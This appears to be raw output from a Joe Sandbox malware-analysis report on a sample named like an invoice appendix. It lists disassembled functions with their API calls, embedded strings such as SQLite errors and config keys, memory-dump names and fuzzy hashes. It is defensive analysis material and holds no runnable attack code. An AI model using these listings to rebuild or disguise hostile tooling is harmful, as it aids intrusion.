                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                              • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                              • API String ID: 2780580303-317687271
                                                                                                              • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                              • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                              • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                              • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                              APIs
                                                                                                              • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                                                              • wcslen.MSVCRT ref: 0040A6B1
                                                                                                              • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                              • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                                                              • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                              • String ID: Unknown Error$netmsg.dll
                                                                                                              • API String ID: 2767993716-572158859
                                                                                                              • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                              • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                              • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                              • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                              APIs
                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                              • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                              • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                              • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                              • API String ID: 3176057301-2039793938
                                                                                                              • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                              • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                              • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                              • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                              • database is already attached, xrefs: 0042F721
                                                                                                              • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                              • database %s is already in use, xrefs: 0042F6C5
                                                                                                              • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                              • out of memory, xrefs: 0042F865
                                                                                                              • unable to open database: %s, xrefs: 0042F84E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpymemset
                                                                                                              • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                              • API String ID: 1297977491-2001300268
                                                                                                              • Opcode ID: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                                                                              • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                              • Opcode Fuzzy Hash: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                                                                              • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                                                                              • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                                                              • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                              • String ID: ($d
                                                                                                              • API String ID: 1140211610-1915259565
                                                                                                              • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                              • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                              • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                              • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                              APIs
                                                                                                              • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                              • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                              • GetLastError.KERNEL32 ref: 004178FB
                                                                                                              • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$ErrorLastLockSleepUnlock
                                                                                                              • String ID:
                                                                                                              • API String ID: 3015003838-0
                                                                                                              • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                              • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                              • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                              • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00407E44
                                                                                                              • memset.MSVCRT ref: 00407E5B
                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                              • wcscpy.MSVCRT ref: 00407F10
                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 59245283-0
                                                                                                              • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                              • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                              • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                              • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                              APIs
                                                                                                              • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                              • GetLastError.KERNEL32 ref: 0041855C
                                                                                                              • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                              • GetLastError.KERNEL32 ref: 0041858E
                                                                                                              • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                              • free.MSVCRT ref: 004185AC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                              • String ID:
                                                                                                              • API String ID: 2802642348-0
                                                                                                              • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                              • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                              • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                              • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                              APIs
                                                                                                              • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                              • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                              • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy
                                                                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                              • API String ID: 3510742995-3273207271
                                                                                                              • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                              • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                              • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                              • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                              APIs
                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                                                              • memset.MSVCRT ref: 00413ADC
                                                                                                              • memset.MSVCRT ref: 00413AEC
                                                                                                                • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                              • memset.MSVCRT ref: 00413BD7
                                                                                                              • wcscpy.MSVCRT ref: 00413BF8
                                                                                                              • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                              • String ID: 3A
                                                                                                              • API String ID: 3300951397-293699754
                                                                                                              • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                              • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                              • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                              • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                              • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                              • wcslen.MSVCRT ref: 0040D1D3
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                              • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                              • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                              • String ID: strings
                                                                                                              • API String ID: 3166385802-3030018805
                                                                                                              • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                              • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                              • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                              • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00411AF6
                                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                              • wcsrchr.MSVCRT ref: 00411B14
                                                                                                              • wcscat.MSVCRT ref: 00411B2E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                              • String ID: AE$.cfg$General$EA
                                                                                                              • API String ID: 776488737-1622828088
                                                                                                              • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                              • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                              • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                              • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040D8BD
                                                                                                              • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                              • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                              • memset.MSVCRT ref: 0040D906
                                                                                                              • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                              • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                              • String ID: sysdatetimepick32
                                                                                                              • API String ID: 1028950076-4169760276
                                                                                                              • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                              • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                              • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                              • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                              APIs
                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                              • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                              • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                              • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                              • memset.MSVCRT ref: 0041BA3D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$memset
                                                                                                              • String ID: -journal$-wal
                                                                                                              • API String ID: 438689982-2894717839
                                                                                                              • Opcode ID: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                                                                                              • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                              • Opcode Fuzzy Hash: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                                                                                              • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C67
